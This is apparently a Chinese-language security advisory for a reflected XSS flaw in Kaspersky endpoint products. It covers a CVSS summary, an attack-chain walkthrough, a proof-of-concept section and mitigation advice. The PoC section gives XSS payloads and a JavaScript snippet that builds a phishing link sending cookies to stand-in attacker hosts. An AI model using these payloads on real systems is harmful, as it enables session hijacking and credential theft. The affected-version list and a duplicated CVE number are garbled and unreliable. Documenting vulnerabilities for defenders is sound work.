CVE-2025-64984 卡巴斯基产品反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64984

漏洞类型

反射型XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Kaspersky Endpoint Security for Linux, Kaspersky Industrial CyberSecurity for Linux Nodes, Kaspersky Endpoint Security for Mac

漏洞概述

CVE-2025-64984是卡巴斯基多款安全产品中存在的反射型跨站脚本(XSS)漏洞。卡巴斯基已确认该漏洞影响Kaspersky Endpoint Security for Linux（使用2025年11月18日之前反病毒数据库的任意版本）、Kaspersky Industrial CyberSecurity for Linux Nodes（使用2025年11月18日之前反病毒数据库的任意版本）以及Kaspersky Endpoint Security for Mac（12.0.0.325、12.1.0.553和12.2.0.694版本，使用2025年11月18日之前反病毒数据库）。攻击者可以通过钓鱼技术诱导用户点击恶意构造的链接，利用产品Web界面未对用户输入进行充分过滤和转义的缺陷，将恶意脚本代码注入到页面响应中。当受害者访问该链接时，注入的脚本代码将在其浏览器上下文中执行，可能导致会话劫持、敏感信息窃取或对用户进行进一步钓鱼攻击。由于该漏洞需要用户交互才能触发，攻击成功依赖于社工手段的配合。CVSS 3.1评分6.1，属于中危级别漏洞。

技术细节

该漏洞为反射型XSS（Non-Persistent XSS），攻击原理基于Web应用对用户输入参数的不当处理。在受影响卡巴斯基产品的Web管理界面中，某些功能点直接使用用户可控的输入参数（如URL参数、表单数据）来动态生成响应页面，而未进行充分的输入验证、过滤或HTML实体编码。攻击者构造包含恶意JavaScript脚本的特殊URL参数，例如在参数值中嵌入<script>alert(document.cookie)</script>，当用户点击攻击者提供的钓鱼链接时，请求被发送至服务器，服务器未经安全处理即将用户输入反射回HTML响应中。浏览器解析响应时，遇到<script>标签会执行其中包含的脚本代码。由于脚本在受害者已认证的会话上下文中执行，攻击者可窃取Cookie、会话令牌等敏感认证信息，或进行键盘记录、页面篡改等操作。攻击成功需满足以下条件：用户点击钓鱼链接、用户已登录受影响产品Web界面、浏览器执行注入脚本。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者收集目标使用的卡巴斯基产品版本信息，确定Web管理界面的URL结构和潜在注入点

STEP 2

步骤2

构造恶意负载：攻击者构造包含XSS payload的特殊URL参数，如在redirect、returnUrl等参数中注入<script>标签或事件处理器

STEP 3

步骤3

社工诱导：攻击者通过钓鱼邮件、即时消息或社交工程手段，诱导目标用户点击构造好的恶意链接

STEP 4

步骤4

触发漏洞：用户点击链接后，浏览器向服务器发送请求，服务器将用户输入的恶意代码未经转义反射回HTML响应

STEP 5

步骤5

脚本执行：用户浏览器解析响应时执行注入的恶意JavaScript代码，在当前会话上下文中运行

STEP 6

步骤6

数据窃取：恶意脚本窃取用户Cookie、会话令牌或其他敏感信息，并发送到攻击者控制的服务器

STEP 7

步骤7

会话劫持：攻击者利用窃取的认证信息接管用户会话，进一步进行未授权操作或横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-2025-64984 Reflected XSS PoC -->
<!-- 构造恶意钓鱼链接，诱导用户点击 -->

<!-- 示例1：基本反射型XSS测试 -->
<!-- https://[target]/[path]?param=<script>alert(document.domain)</script> -->

<!-- 示例2：绕过简单过滤的XSS payload -->
<!-- https://[target]/[path]?param=<img src=x onerror=alert(document.cookie)> -->

<!-- 示例3：钓鱼攻击场景的社工链接 -->
<!-- 攻击者发送邮件，声称需要用户确认安全设置 -->
<!-- 链接指向: https://[target]/klp-webshield?returnUrl=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script> -->

<!-- 完整攻击流程代码示例 -->
const xssPayload = '<script>\n' +
    'fetch("https://attacker-controlled.com/log?cookie=" + encodeURIComponent(document.cookie)).\n' +
    'then(r => console.log("Exfiltrated"))\n' +
    '</script>';

const maliciousURL = `https://[KASPERSKY-PRODUCT]/endpoint_security?redirect=${encodeURIComponent(xssPayload)}`;

// 攻击者通过邮件发送此链接
console.log('Send this phishing link:', maliciousURL);

// 当用户点击并访问后，脚本将在其浏览器执行
// 可窃取会话Cookie并发送到攻击者服务器

影响范围

Kaspersky Endpoint Security for Linux < 任意版本（需2025年11月18日之后反病毒数据库）

Kaspersky Industrial CyberSecurity for Linux Nodes < 任意版本（需2025年11月18日之后反病毒数据库）

Kaspersky Endpoint Security for Mac 12.0.0.325 < 12.0.0.325（需2025年11月18日之后反病毒数据库）

Kaspersky Endpoint Security for Mac 12.1.0.553 < 12.1.0.553（需2025年11月18日之后反病毒数据库）

Kaspersky Endpoint Security for Mac 12.2.0.694 < 12.2.0.694（需2025年11月18日之后反病毒数据库）

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 限制Web管理界面的访问来源，仅允许受信任的IP地址访问；2) 通过邮件安全网关过滤包含可疑URL参数的邮件；3) 对管理员进行安全意识培训，提醒不要点击来源不明的链接；4) 考虑暂时禁用非必要的Web管理功能；5) 启用浏览器安全插件帮助检测和阻止XSS攻击；6) 实施严格的会话管理策略，包括会话超时、强制重新认证等。